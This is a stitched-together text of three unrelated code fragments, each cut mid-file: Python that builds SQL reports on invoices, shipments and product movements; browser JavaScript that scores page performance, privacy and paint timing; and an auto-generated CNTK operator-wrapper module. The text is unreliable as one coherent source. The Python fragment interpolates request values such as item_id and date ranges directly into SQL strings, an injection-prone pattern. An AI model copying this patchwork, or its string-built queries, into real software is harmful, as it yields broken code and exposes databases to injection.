jmh.n_dt_invoice as doc_date,
rpc.n_name as doc_rec_name,
j1.name as pos_prod_name,
jmb.n_product->'n_unit' as pos_unit,
jmb.n_product->'n_amount' as pos_kol,
case
when (jmb.n_product->'n_amount')::int > 0
then (jmb.n_product->'n_total_summ')::int /(jmb.n_product->'n_amount')::int
else 0
end as pos_sale_price,
jmb.n_product->'n_total_summ' as pos_sale_total,
'' as seria, --jpb.n_consignment as seria,
'' as goden,
case
when (jmb.n_product->'n_amount')::int > 0
then ((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int / (jmb.n_product->'n_amount')::int
else 0
end as pos_prih_price,
((jmb.n_product->'n_total_summ')::numeric / (1 + (jmb.n_product->'n_charge')::numeric))::int as pos_prih_total,
rpu.n_name as u_name
from journals_movements_headers jmh
join ref_partners rpc on rpc.n_id = jmh.n_recipient
join ref_partners rps on rps.n_id = jmh.n_supplier
join journals_movements_bodies jmb ON jmb.n_doc_id = jmh.n_id and jmb.n_deleted = false
-- join journals_products_balance jpb on jpb.n_id = (jmb.n_product->'n_balance_id')::bigint
join (select d1.n_product_id as n_product_id, rp.c_name as name, d1.stock as stock
from (select pb.n_product_id as n_product_id, max(pb.n_quantity) as stock
from journals_products_balance pb
group by pb.n_product_id) as d1
join ref_products rp on (rp.c_id=d1.n_product_id)) as j1
on (j1.n_product_id = (jmb.n_product->'n_balance_id')::bigint)
join ref_partners rpu on rpu.n_id = rpc.n_parent_id
where jmh.n_id = '{doc_number}'::bigint
order by pos_prod_name --jmb.n_id"""
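# Try the newer query first (stock derived via max() over journals_products_balance);
# if it returns no rows, fall back to sql_old, which joins the balance table directly.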
res = self.parent._request(sql)
if not res:
print(sql_old)
res = self.parent._request(sql_old)
else:
print(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][7],
'base': res[0][1],
'retailer': {
'name': res[0][3]
},
'customer': {
'name': res[0][18],
'storage': res[0][8],
},
'lines': [],
'arrival_total': self._gen_price(res[0][6]),
'sell_total': self._gen_price(res[0][5]),
'sell_total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'consignment': row[14],
'name': row[9],
'unit': row[10],
'expired': row[15],
'arrival_price': self._gen_price(row[16]),
'arrival_amount': self._gen_price(row[17]),
'sell_price': self._gen_price(row[12]),
'sell_amount': self._gen_price(row[13]),
'quantity': row[11],
}
}
data['lines'].append(r)
return data
def _generate_short_shipment(self, doc_number):
self.parent._print(doc_number)
data = {}
sql = f"""select
jsh.n_number as doc_number,
jsh.n_base as doc_base,
jsh.n_executor as doc_employ,
rps.n_name as doc_suppl,
jsh.n_pos_numbers as doc_positions,
jsh.n_summ as doc_sell_total,
(jsh.n_summ::numeric / (1 + (jsb.n_product->'n_charge')::numeric))::int as doc_prih_total,
jsh.n_dt_invoice as doc_date,
rpc.n_name as doc_rec_name,
j1.name as pos_prod_name,
jsb.n_product->'n_unit' as pos_unit,
jsb.n_product->'n_amount' as pos_kol,
(jsb.n_product->'n_total_summ')::int / (jsb.n_product->'n_amount')::int as pos_sale_price,
jsb.n_product->'n_total_summ' as pos_sale_total,
jpb.n_consignment as seria,
'' as goden,
((jsb.n_product->'n_total_summ')::numeric / (1 + (jsb.n_product->'n_charge')::numeric))::int / (jsb.n_product->'n_amount')::int as pos_prih_price,
((jsb.n_product->'n_total_summ')::numeric / (1 + (jsb.n_product->'n_charge')::numeric))::int as pos_prih_total
from journals_shipments_headers jsh
join ref_partners rpc on rpc.n_id = jsh.n_recipient
join ref_partners rps on rps.n_id = jsh.n_supplier
join journals_shipments_bodies jsb ON jsb.n_doc_id = jsh.n_id and jsb.n_deleted = false
join journals_products_balance jpb on jpb.n_id = (jsb.n_product->'n_balance_id')::bigint
join (select pb.n_product_id, rp.c_name as name, pb.n_id as id, pb.n_quantity as stock
from journals_products_balance pb
join ref_products rp on (rp.c_id=pb.n_product_id)) as j1
on (j1.id = (jsb.n_product->'n_balance_id')::bigint)
where jsh.n_id = '{doc_number}'::bigint
order by jsb.n_id"""
res = self.parent._request(sql)
if res:
data = {
'number': res[0][0],
'date': res[0][7],
'base': res[0][1],
'retailer': {
'name': res[0][3]
},
'customer': {
'name': res[0][8],
'storage': res[0][8],
},
'lines': [],
'arrival_total': self._gen_price(res[0][6]),
'sell_total': self._gen_price(res[0][5]),
'sell_total_text': '--'
}
for i, row in enumerate(res, 1):
r = {'item': {
'pos': i,
'consignment': row[14],
'name': row[9],
'unit': row[10],
'expired': row[15],
'arrival_price': self._gen_price(row[16]),
'arrival_amount': self._gen_price(row[17]),
'sell_price': self._gen_price(row[12]),
'sell_amount': self._gen_price(row[13]),
'quantity': row[11],
}
}
data['lines'].append(r)
return data
def product_movement(self, *args, **kwargs):
self.parent._print("*"*10, " product_movement ", "*"*10)
self.parent._print(args)
self.parent._print(kwargs)
self.parent._print("*"*10, " product_movement ", "*"*10)
doc_type = 'products_movements'
date1 = kwargs.get('date1')
date2 = kwargs.get('date2')
arr_fg = kwargs.get('arr_fg')
dep_fg = kwargs.get('dep_fg')
item_id = kwargs.get('item_id')
answer = {"params": args,
"kwargs": kwargs,
}
d_data = []
a_data = []
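# Two legs are built and UNIONed below depending on the flags: sql_arr collects
# incoming quantities from arrivals, sql_move collects outgoing quantities from
# movements, both filtered to the selected product and date range.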
sql_move = f"""select
jmh.n_number as doc_number,
jmh.n_dt_invoice as doc_date,
'' as suppl,
rp.n_name as point,
0,
(jmb.n_product->'n_amount')::text::numeric as amount,
(select c_name from ref_products where c_id = {item_id})
from journals_movements_bodies jmb
join journals_movements_headers jmh on jmb.n_doc_id = jmh.n_id
join ref_partners rp ON rp.n_id = jmh.n_recipient
where (jmb.n_product->'n_balance_id')::text in (select jpb.n_id::text
from journals_products_balance jpb
where jpb.n_product_id = {item_id})
and jmb.n_deleted=false
and jmh.n_dt_invoice >= '{date1}'::date
and jmh.n_dt_invoice <= '{date2}'::date
"""
sql_arr = f"""select
jah.n_number as doc_number,
jah.n_dt_invoice as doc_date,
rp.n_name as suppl,
'' as point,
(jab.n_product->'n_amount')::text::numeric as amount,
0,
(select c_name from ref_products where c_id = {item_id})
from journals_arrivals_bodies jab
join journals_arrivals_headers jah on jab.n_doc_id = jah.n_id
join ref_partners rp ON rp.n_id = jah.n_supplier
where (jab.n_product->'n_product')::text = '{item_id}'
and jab.n_deleted=false
and jah.n_dt_invoice >= '{date1}'::date
and jah.n_dt_invoice <= '{date2}'::date
"""
sqls = []
if not arr_fg and not dep_fg:
return answer
if arr_fg:
sqls.append(sql_arr)
if dep_fg:
sqls.append(sql_move)
sqls = '\nunion all\n'.join(sqls)
sql = f"""select * from (
{sqls}
) as aa
order by doc_date asc, doc_number
"""
# print(sql)
a_data = self.parent._request(sql)
if a_data:
data = {
'lines': [],
'tovar': a_data[0][6],
'date1': datetime.datetime.strptime(date1, '%Y-%m-%d %H:%M:%S').strftime('%d-%m-%y'),
'date2': datetime.datetime.strptime(date2, '%Y-%m-%d %H:%M:%S').strftime('%d-%m-%y'),
'arr_total': 0,
'dep_total': 0,
}
for i, row in enumerate(a_data, 1):
d = datetime.datetime.strptime(row[1], '%Y-%m-%d')
r = {'item': {
'doc': row[0],
'date': d.strftime('%d-%m-%y'),
'suppl': row[2],
'recip': | |
= getHostname(element);
if (elementDomain !== docDomain) {
offending.push(element);
if (offendingDomains.indexOf(elementDomain) === -1) {
offendingDomains.push(elementDomain);
score += 10;
}
}
}
cssFilesInHead.forEach(function (style) {
checkDomain(style)
});
synchJsScript.forEach(function (script) {
checkDomain(script)
});
return [Math.max(0, 100 - score), offending]
}
function thirdPartyAsyncJs() {
var score = 0;
var offending = [];
function is3rdParty(url) {
var hostname = getHostname(url);
var re;
for (var i = 0; i < patterns.length; i++) {
re = new RegExp(patterns[i]);
if (re.test(hostname)) {
return true;
}
}
return false;
}
thirdPartyScript.forEach(function (script) {
if (is3rdParty(script)) {
offending.push(script);
score += 10;
}
})
return [Math.max(0, 100 - score), offending]
}
return {
'performanceScalingImages': avoidScalingImages(),
'performanceCssPrint': cssPrint(),
'performanceFastRender': fastRender(),
'performanceGoogleTagManager': googleTagManager(),
'performanceInlineCss': inlineCss(),
'performanceJQuery': pageJquery(),
'performanceSPOF': spof(),
'performanceThirdPartyAsyncJs': thirdPartyAsyncJs()
}
}
function checkInfo() {
function browser(){
var match = window.navigator.userAgent.match(browsers_regex);
return match ? match[1] + ' ' + match[2] : 'unknown';
}
function domDepth(document) {
function numParents(elem) {
var n = 0;
if (elem.parentNode) {
while ((elem = elem.parentNode)) {
n++;
}
}
return n;
}
var allElems = document.getElementsByTagName('*');
var allElemsLen = allElems.length;
var totalParents = 0;
var maxParents = 0;
while (allElemsLen--) {
var parents = numParents(allElems[allElemsLen]);
if (parents > maxParents) {
maxParents = parents;
}
totalParents += parents;
}
var average = totalParents / allElems.length;
return {
avg: Math.round(average),
max: maxParents
};
}
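// Approximates storage size by summing key and value string lengths
// (UTF-16 code units), i.e. characters rather than literal bytes.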
function storageSize(storage) {
if (storage) {
var keys = storage.length || Object.keys(storage).length;
var bytes = 0;
for (var i = 0; i < keys; i++) {
var key = storage.key(i);
var val = storage.getItem(key);
bytes += key.length + val.length;
}
return bytes;
} else {
return 0;
}
}
function metadataDescription(){
var description = document.querySelector('meta[name="description"]');
var og = document.querySelector('meta[property="og:description"]');
if (description) {
return description.getAttribute('content');
} else if (og) {
return og.getAttribute('content');
} else {
return '';
}
}
function isResponsive(){
var isResponsive = true;
var bodyScrollWidth = document.body.scrollWidth;
var windowInnerWidth = window.innerWidth;
var nodes = document.body.children;
if (bodyScrollWidth > windowInnerWidth) {
isResponsive = false;
}
for (var i = 0; i < nodes.length; i++) {
if (nodes[i].scrollWidth > windowInnerWidth) {
isResponsive = false;
}
}
return isResponsive;
}
function serviceWorker(){
if ('serviceWorker' in navigator) {
// Only report activated service workers
if (navigator.serviceWorker.controller) {
if (navigator.serviceWorker.controller.state === 'activated') {
return navigator.serviceWorker.controller.scriptURL;
} else return false;
} else {
return false;
}
} else {
return false;
}
}
function windowSize() {
var width =
window.innerWidth ||
document.documentElement.clientWidth ||
document.body.clientWidth;
var height =
window.innerHeight ||
document.documentElement.clientHeight ||
document.body.clientHeight;
return width + 'x' + height;
}
return {
amp: amp(),
browser: browser(),
documentHeight: Math.max(document.body.scrollHeight,document.body.offsetHeight, document.documentElement.clientHeight,document.documentElement.scrollHeight,document.documentElement.offsetHeight),
documentWidth: Math.max(document.body.scrollWidth,document.body.offsetWidth,document.documentElement.clientWidth,document.documentElement.scrollWidth,document.documentElement.offsetWidth),
connectionType: connectionType,
title: docTitle,
domDepth: domDepth(document),
domElements: document.getElementsByTagName('*').length,
head: {jssync: synchJsScript,jsasync: getAsynchJSFiles(docHead),css: getCSSFiles},
iframes: document.getElementsByTagName('iframe').length,
jsframework: {
angular: window.angular ? window.angular.version.full : false,
backbone: window.Backbone ? window.Backbone.VERSION : false,
preact: window.preact ? true : false,
vue: window.Vue ? true : false
},
storageSize: storageSize(window.localStorage),
networkConncetionType: window.navigator.connection ? window.navigator.connection.effectiveType : 'unknown',
resourceHint: {
dnsprefetch: getResourceHintsHrefs('dns-prefetch'),
preconnect: getResourceHintsHrefs('preconnect'),
prefetch: getResourceHintsHrefs('prefetch'),
prerender: getResourceHintsHrefs('prerender')
},
isResponsive: isResponsive(),
scripts: scripts.length,
serializedDomSize: document.body.innerHTML.length,
serviceWorker: serviceWorker(),
sessionStorageSize: storageSize(window.sessionStorage),
thirdParty: {
boomerang: window.BOOMR ? window.BOOMR.version : false,
facebook: window.FB ? true : false,
gtm: window.google_tag_manager ? true : false,
ga: window.ga ? true : false,
jquery: window.jQuery ? window.jQuery.fn.jquery : false,
newrelic: window.newrelic ? true : false,
matomo: window.Piwik ? true : window.Matomo ? true : false
},
userTiming: {
marks: marks.length,
measures: measures.length
},
windowSize: windowSize()
}
}
function checkPrivacy(){
function survilance() {
var score = 100;
var offending = [];
var offenders = ['.google.', 'facebook.com', 'youtube.', 'yahoo.com'];
for (var i = 0; i < offenders.length; i++) {
if (docDomain.indexOf(offenders[i]) > -1) {
score = 0;
offending.push(docDomain);
}
}
return [score, offending]
}
return {
amp: [amp() ? 0 : 100, amp()],
facebook: [window.FB ? 0 : 100, window.FB],
ga: [window.ga && window.ga.create ? 0 : 100, window.ga && window.ga.create],
https: [docUrl.indexOf('https://') === -1 ? 0 : 100, new URL(docUrl).protocol],
survilance: survilance(),
youtube: [window.YT? 0 : 100, window.YT]
}
}
function checkTiming() {
function GetFirstPaint() {
// Try the standardized paint timing api
var win=window;
var doc = win.document;
var firstPaint = undefined
try {
var entries = performanceObj.getEntriesByType('paint');
for (var i = 0; i < entries.length; i++) {
if (entries[i]['name'] == 'first-paint') {
navStart = performanceObj.getEntriesByType("navigation")[0].startTime;
firstPaint = entries[i].startTime - navStart;
break;
}
}
} catch(e) {
}
// If the browser supports a first paint event, just use what the browser reports
if (firstPaint === undefined && 'msFirstPaint' in win.performance.timing)
firstPaint = performanceObj.timing.msFirstPaint - navStart;
// For browsers that don't support first-paint or where we get insane values,
// use the time of the last non-async script or css from the head.
if (firstPaint === undefined || firstPaint < 0 || firstPaint > 120000) {
firstPaint = performanceObj.timing.responseStart - navStart;
var headURLs = {};
var headElements = doc.getElementsByTagName('head')[0].children;
for (var i = 0; i < headElements.length; i++) {
var el = headElements[i];
if (el.tagName == 'SCRIPT' && el.src && !el.async)
headURLs[el.src] = true;
if (el.tagName == 'LINK' && el.rel == 'stylesheet' && el.href)
headURLs[el.href] = true;
}
var requests = performanceObj.getEntriesByType("resource");
var doneCritical = false;
for (var j = 0; j < requests.length; j++) {
if (!doneCritical &&
headURLs[requests[j].name] &&
(requests[j].initiatorType == 'script' || requests[j].initiatorType == 'link')) {
var requestEnd = requests[j].responseEnd;
if (firstPaint === undefined || requestEnd > firstPaint)
firstPaint = requestEnd;
} else {
doneCritical = true;
}
}
}
return Number(Math.max(firstPaint, 0).toFixed(0));
};
function fullyLoaded(){
// this checks the last loaded resource; note that recurring requests
// (e.g. polling/beacons) can inflate this metric
if (performanceObj && performanceObj.getEntriesByType) {
var resources = performanceObj.getEntriesByType('resource');
var max = 0;
for (var i = 1, len = resources.length; i < len; i++) {
if (resources[i].responseEnd > max) {
max = resources[i].responseEnd;
}
}
return max;
} else {
return -1;
}
}
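// RUM Speed Index approximation (appears to follow Pat Meenan's rum-speedindex.js):
// collect viewport rects for images and background images, look up when each
// resource finished loading via Resource Timing, then compute an area-weighted
// visual-progress curve starting from first paint.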
function RUMSpeedIndex(win) {
win = win || window;
var doc = win.document;
/****************************************************************************
Support Routines
****************************************************************************/
// Get the rect for the visible portion of the provided DOM element
function GetElementViewportRect(el) {
var intersect = false;
if (el.getBoundingClientRect) {
var elRect = el.getBoundingClientRect();
intersect = {'top': Math.max(elRect.top, 0),
'left': Math.max(elRect.left, 0),
'bottom': Math.min(elRect.bottom, (win.innerHeight || doc.documentElement.clientHeight)),
'right': Math.min(elRect.right, (win.innerWidth || doc.documentElement.clientWidth))};
if (intersect.bottom <= intersect.top ||
intersect.right <= intersect.left) {
intersect = false;
} else {
intersect.area = (intersect.bottom - intersect.top) * (intersect.right - intersect.left);
}
}
return intersect;
};
// Check a given element to see if it is visible
function CheckElement(el, url) {
if (url) {
var rect = GetElementViewportRect(el);
if (rect) {
rects.push({'url': url,
'area': rect.area,
'rect': rect});
}
}
};
// Get the visible rectangles for elements that we care about
function GetRects() {
// Walk all of the elements in the DOM (try to only do this once)
var elements = doc.getElementsByTagName('*');
var re = /url\(.*(http.*)\)/ig;
for (var i = 0; i < elements.length; i++) {
var el = elements[i];
var style = win.getComputedStyle(el);
// check for Images
if (el.tagName == 'IMG') {
CheckElement(el, el.src);
}
// Check for background images
if (style['background-image']) {
re.lastIndex = 0;
var matches = re.exec(style['background-image']);
if (matches && matches.length > 1)
CheckElement(el, matches[1].replace('"', ''));
}
// recursively walk any iFrames
if (el.tagName == 'IFRAME') {
try {
var rect = GetElementViewportRect(el);
if (rect) {
var tm = RUMSpeedIndex(el.contentWindow);
if (tm) {
rects.push({'tm': tm,
'area': rect.area,
'rect': rect});
}
}
} catch(e) {
}
}
}
};
// Get the time at which each external resource loaded
function GetRectTimings() {
var timings = {};
var requests = win.performance.getEntriesByType("resource");
for (var i = 0; i < requests.length; i++)
timings[requests[i].name] = requests[i].responseEnd;
for (var j = 0; j < rects.length; j++) {
if (!('tm' in rects[j]))
rects[j].tm = timings[rects[j].url] !== undefined ? timings[rects[j].url] : 0;
}
};
// Sort and group all of the paint rects by time and use them to
// calculate the visual progress
var CalculateVisualProgress = function() {
var paints = {'0':0};
var total = 0;
for (var i = 0; i < rects.length; i++) {
var tm = firstPaint;
if ('tm' in rects[i] && rects[i].tm > firstPaint)
tm = rects[i].tm;
if (paints[tm] === undefined)
paints[tm] = 0;
paints[tm] += rects[i].area;
total += rects[i].area;
}
// Add a paint area for the page background (count 10% of the pixels not
// covered by existing paint rects).
var pixels = Math.max(doc.documentElement.clientWidth, win.innerWidth || 0) *
Math.max(doc.documentElement.clientHeight, win.innerHeight || 0);
if (pixels > 0 ) {
pixels = Math.max(pixels - total, 0) * pageBackgroundWeight;
if (paints[firstPaint] === undefined)
paints[firstPaint] = 0;
paints[firstPaint] += pixels;
total += pixels;
}
// Calculate the visual progress
if (total) {
for (var time in | |
<reponame>Acidburn0zzz/CNTK<filename>contrib/Python/cntk/cntk1_ops.py
# This file is auto-generated by _fetch_ops.py.
from cntk.graph import ComputationNode, InputComputationNodeBase, ImageInputComputationNodeBase
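# Illustrative usage sketch (not part of the generated ops; assumes the CNTK 1.x
# graph API these wrappers describe):
#   x = Input(2)                       # feature input of dimension 2
#   W = LearnableParameter(1, 2)       # 1x2 weight matrix
#   z = Times(W, x)                    # builds a ComputationNode graph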
class Print(ComputationNode):
def __init__(self, value, format='', name='Print', var_name=None):
super(Print, self).__init__(params=['value', 'format'], name=name, var_name=var_name)
self.value = value
self.format = format
self.params_with_defaults = ['format']
class Debug(ComputationNode):
def __init__(self, value, say='', enabled=True, name='Debug', var_name=None):
super(Debug, self).__init__(params=['value', 'say', 'enabled'], name=name, var_name=var_name)
self.value = value
self.say = say
self.enabled = enabled
self.params_with_defaults = ['say', 'enabled']
class Format(ComputationNode):
def __init__(self, value, format, name='Format', var_name=None):
super(Format, self).__init__(params=['value', 'format'], name=name, var_name=var_name)
self.value = value
self.format = format
self.params_with_defaults = []
class Replace(ComputationNode):
def __init__(self, s, from_, to, name='Replace', var_name=None):
super(Replace, self).__init__(params=['s', 'from_', 'to'], name=name, var_name=var_name)
self.s = s
self.from_ = from_
self.to = to
self.params_with_defaults = []
class Substr(ComputationNode):
def __init__(self, s, begin, num, name='Substr', var_name=None):
super(Substr, self).__init__(params=['s', 'begin', 'num'], name=name, var_name=var_name)
self.s = s
self.begin = begin
self.num = num
self.params_with_defaults = []
class Chr(ComputationNode):
def __init__(self, c, name='Chr', var_name=None):
super(Chr, self).__init__(params=['c'], name=name, var_name=var_name)
self.c = c
self.params_with_defaults = []
class Length(ComputationNode):
def __init__(self, x, name='Length', var_name=None):
super(Length, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Ceil(ComputationNode):
def __init__(self, x, name='Ceil', var_name=None):
super(Ceil, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Round(ComputationNode):
def __init__(self, x, name='Round', var_name=None):
super(Round, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Sign(ComputationNode):
def __init__(self, x, name='Sign', var_name=None):
super(Sign, self).__init__(params=['x'], name=name, var_name=var_name)
self.x = x
self.params_with_defaults = []
class Min(ComputationNode):
def __init__(self, a, b, name='Min', var_name=None):
super(Min, self).__init__(params=['a', 'b'], name=name, var_name=var_name)
self.a = a
self.b = b
self.params_with_defaults = []
class Max(ComputationNode):
def __init__(self, a, b, name='Max', var_name=None):
super(Max, self).__init__(params=['a', 'b'], name=name, var_name=var_name)
self.a = a
self.b = b
self.params_with_defaults = []
class Fac(ComputationNode):
def __init__(self, n, name='Fac', var_name=None):
super(Fac, self).__init__(params=['n'], name=name, var_name=var_name)
self.n = n
self.params_with_defaults = []
class LearnableParameter(ComputationNode):
def __init__(self, rows, cols, learningRateMultiplier=1.0, init='uniform', initValueScale=1, value=0, initFromFilePath='', initOnCPUOnly=True, randomSeed=-1, name='LearnableParameter', var_name=None):
super(LearnableParameter, self).__init__(params=['rows', 'cols', 'learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed'], name=name, var_name=var_name)
self.rows = rows
self.cols = cols
self.learningRateMultiplier = learningRateMultiplier
self.init = init
self.initValueScale = initValueScale
self.value = value
self.initFromFilePath = initFromFilePath
self.initOnCPUOnly = initOnCPUOnly
self.randomSeed = randomSeed
self.params_with_defaults = ['learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed']
class ParameterTensor(ComputationNode):
def __init__(self, dims, learningRateMultiplier=1.0, init='uniform', initValueScale=1, value=0, initFromFilePath='', initOnCPUOnly=True, randomSeed=-1, name='ParameterTensor', var_name=None):
super(ParameterTensor, self).__init__(params=['dims', 'learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed'], name=name, var_name=var_name)
self.dims = dims
self.learningRateMultiplier = learningRateMultiplier
self.init = init
self.initValueScale = initValueScale
self.value = value
self.initFromFilePath = initFromFilePath
self.initOnCPUOnly = initOnCPUOnly
self.randomSeed = randomSeed
self.params_with_defaults = ['learningRateMultiplier', 'init', 'initValueScale', 'value', 'initFromFilePath', 'initOnCPUOnly', 'randomSeed']
class Input(InputComputationNodeBase):
def __init__(self, dims, tag='feature', name='Input', var_name=None):
super(Input, self).__init__(params=['dims', 'tag'], name=name, var_name=var_name)
self.dims = dims
self.tag = tag
self.params_with_defaults = ['tag']
class SparseInput(InputComputationNodeBase):
def __init__(self, dims, tag='feature', name='SparseInput', var_name=None):
super(SparseInput, self).__init__(params=['dims', 'tag'], name=name, var_name=var_name)
self.dims = dims
self.tag = tag
self.params_with_defaults = ['tag']
class ImageInput(ImageInputComputationNodeBase):
def __init__(self, imageWidth, imageHeight, imageChannels, imageLayout='CHW', tag='feature', name='ImageInput', var_name=None):
super(ImageInput, self).__init__(params=['imageWidth', 'imageHeight', 'imageChannels', 'imageLayout', 'tag'], name=name, var_name=var_name)
self.imageWidth = imageWidth
self.imageHeight = imageHeight
self.imageChannels = imageChannels
self.imageLayout = imageLayout
self.tag = tag
self.params_with_defaults = ['imageLayout', 'tag']
class SparseImageInput(ImageInputComputationNodeBase):
def __init__(self, imageWidth, imageHeight, imageChannels, imageLayout='CHW', tag='feature', name='SparseImageInput', var_name=None):
super(SparseImageInput, self).__init__(params=['imageWidth', 'imageHeight', 'imageChannels', 'imageLayout', 'tag'], name=name, var_name=var_name)
self.imageWidth = imageWidth
self.imageHeight = imageHeight
self.imageChannels = imageChannels
self.imageLayout = imageLayout
self.tag = tag
self.params_with_defaults = ['imageLayout', 'tag']
class EnvironmentInput(ComputationNode):
def __init__(self, propertyName, name='EnvironmentInput', var_name=None):
super(EnvironmentInput, self).__init__(params=['propertyName'], name=name, var_name=var_name)
self.propertyName = propertyName
self.params_with_defaults = []
class PastValue(ComputationNode):
def __init__(self, dims, input, timeStep=1, defaultHiddenActivation=0.1, name='PastValue', var_name=None):
super(PastValue, self).__init__(params=['dims', 'input', 'timeStep', 'defaultHiddenActivation'], name=name, var_name=var_name)
self.dims = dims
self.input = input
self.timeStep = timeStep
self.defaultHiddenActivation = defaultHiddenActivation
self.params_with_defaults = ['timeStep', 'defaultHiddenActivation']
class FutureValue(ComputationNode):
def __init__(self, dims, input, timeStep=1, defaultHiddenActivation=0.1, name='FutureValue', var_name=None):
super(FutureValue, self).__init__(params=['dims', 'input', 'timeStep', 'defaultHiddenActivation'], name=name, var_name=var_name)
self.dims = dims
self.input = input
self.timeStep = timeStep
self.defaultHiddenActivation = defaultHiddenActivation
self.params_with_defaults = ['timeStep', 'defaultHiddenActivation']
class Shift(ComputationNode):
def __init__(self, input, fromOffset, boundaryValue, boundaryMode=-1, dim=-1, name='Shift', var_name=None):
super(Shift, self).__init__(params=['input', 'fromOffset', 'boundaryValue', 'boundaryMode', 'dim'], name=name, var_name=var_name)
self.input = input
self.fromOffset = fromOffset
self.boundaryValue = boundaryValue
self.boundaryMode = boundaryMode
self.dim = dim
self.params_with_defaults = ['boundaryMode', 'dim']
class RowSlice(ComputationNode):
def __init__(self, startIndex, numRows, input, name='RowSlice', var_name=None):
super(RowSlice, self).__init__(params=['startIndex', 'numRows', 'input'], name=name, var_name=var_name)
self.startIndex = startIndex
self.numRows = numRows
self.input = input
self.params_with_defaults = []
class RowRepeat(ComputationNode):
def __init__(self, input, numRepeats, name='RowRepeat', var_name=None):
super(RowRepeat, self).__init__(params=['input', 'numRepeats'], name=name, var_name=var_name)
self.input = input
self.numRepeats = numRepeats
self.params_with_defaults = []
class RowStack(ComputationNode):
def __init__(self, inputs, name='RowStack', var_name=None):
super(RowStack, self).__init__(params=['inputs'], name=name, var_name=var_name)
self.inputs = inputs
self.params_with_defaults = []
class Reshape(ComputationNode):
def __init__(self, input, numRows, imageWidth=0, imageHeight=0, imageChannels=0, name='Reshape', var_name=None):
super(Reshape, self).__init__(params=['input', 'numRows', 'imageWidth', 'imageHeight', 'imageChannels'], name=name, var_name=var_name)
self.input = input
self.numRows = numRows
self.imageWidth = imageWidth
self.imageHeight = imageHeight
self.imageChannels = imageChannels
self.params_with_defaults = ['imageWidth', 'imageHeight', 'imageChannels']
class NewReshape(ComputationNode):
def __init__(self, input, dims, beginDim=0, endDim=0, name='NewReshape', var_name=None):
super(NewReshape, self).__init__(params=['input', 'dims', 'beginDim', 'endDim'], name=name, var_name=var_name)
self.input = input
self.dims = dims
self.beginDim = beginDim
self.endDim = endDim
self.params_with_defaults = ['beginDim', 'endDim']
class TransposeDimensions(ComputationNode):
def __init__(self, input, dim1, dim2, name='TransposeDimensions', var_name=None):
super(TransposeDimensions, self).__init__(params=['input', 'dim1', 'dim2'], name=name, var_name=var_name)
self.input = input
self.dim1 = dim1
self.dim2 = dim2
self.params_with_defaults = []
class Times(ComputationNode):
def __init__(self, A, B, outputRank=1, name='Times', var_name=None):
super(Times, self).__init__(params=['A', 'B', 'outputRank'], name=name, var_name=var_name)
self.A = A
self.B = B
self.outputRank = outputRank
self.params_with_defaults = ['outputRank']
class Logistic(ComputationNode):
def __init__(self, label, probability, name='Logistic', var_name=None):
super(Logistic, self).__init__(params=['label', 'probability'], name=name, var_name=var_name)
self.label = label
self.probability = probability
self.params_with_defaults = []
class WeightedLogistic(ComputationNode):
def __init__(self, label, probability, instanceWeight, name='WeightedLogistic', var_name=None):
super(WeightedLogistic, self).__init__(params=['label', 'probability', 'instanceWeight'], name=name, var_name=var_name)
self.label = label
self.probability = probability
self.instanceWeight = instanceWeight
self.params_with_defaults = []
class ReconcileMBLayout(ComputationNode):
def __init__(self, dataInput, layoutInput, name='ReconcileMBLayout', var_name=None):
super(ReconcileMBLayout, self).__init__(params=['dataInput', 'layoutInput'], name=name, var_name=var_name)
self.dataInput = dataInput
self.layoutInput = layoutInput
self.params_with_defaults = []
class Convolution(ComputationNode):
def __init__(self, weightNode, inputValueNode, kernelWidth, kernelHeight, outputChannels, horizontalSubsample, verticalSubsample, zeroPadding=False, maxTempMemSizeInSamples=0, imageLayout='CHW', name='Convolution', var_name=None):
super(Convolution, self).__init__(params=['weightNode', 'inputValueNode', 'kernelWidth', 'kernelHeight', 'outputChannels', 'horizontalSubsample', 'verticalSubsample', 'zeroPadding', 'maxTempMemSizeInSamples', 'imageLayout'], name=name, var_name=var_name)
self.weightNode = weightNode
self.inputValueNode = inputValueNode
self.kernelWidth = kernelWidth
self.kernelHeight = kernelHeight
self.outputChannels = outputChannels
self.horizontalSubsample = horizontalSubsample
self.verticalSubsample = verticalSubsample
self.zeroPadding = zeroPadding
self.maxTempMemSizeInSamples = maxTempMemSizeInSamples
self.imageLayout = imageLayout
self.params_with_defaults = ['zeroPadding', 'maxTempMemSizeInSamples', 'imageLayout']
class MaxPooling(ComputationNode):
def __init__(self, input, windowWidth, windowHeight, horizontalSubsample, verticalSubsample, imageLayout='CHW', name='MaxPooling', var_name=None):
super(MaxPooling, self).__init__(params=['input', 'windowWidth', 'windowHeight', 'horizontalSubsample', 'verticalSubsample', 'imageLayout'], name=name, var_name=var_name)
self.input = input
self.windowWidth = windowWidth
self.windowHeight = windowHeight
self.horizontalSubsample = horizontalSubsample
self.verticalSubsample = verticalSubsample
self.imageLayout = imageLayout
self.params_with_defaults = ['imageLayout']
class AveragePooling(ComputationNode):
def __init__(self, input, windowWidth, windowHeight, horizontalSubsample, verticalSubsample, imageLayout='CHW', name='AveragePooling', var_name=None):
super(AveragePooling, self).__init__(params=['input', 'windowWidth', 'windowHeight', 'horizontalSubsample', 'verticalSubsample', 'imageLayout'], name=name, var_name=var_name)
self.input = input
self.windowWidth = windowWidth
self.windowHeight = windowHeight
self.horizontalSubsample = horizontalSubsample
self.verticalSubsample = verticalSubsample
self.imageLayout = imageLayout
self.params_with_defaults = ['imageLayout']
class BatchNormalization(ComputationNode):
def __init__(self, input, scale, bias, runMean, runInvStdDev, eval, spatial, normalizationTimeConstant=0, epsilon=1e-05, useCntkEngine=True, imageLayout='CHW', name='BatchNormalization', var_name=None):
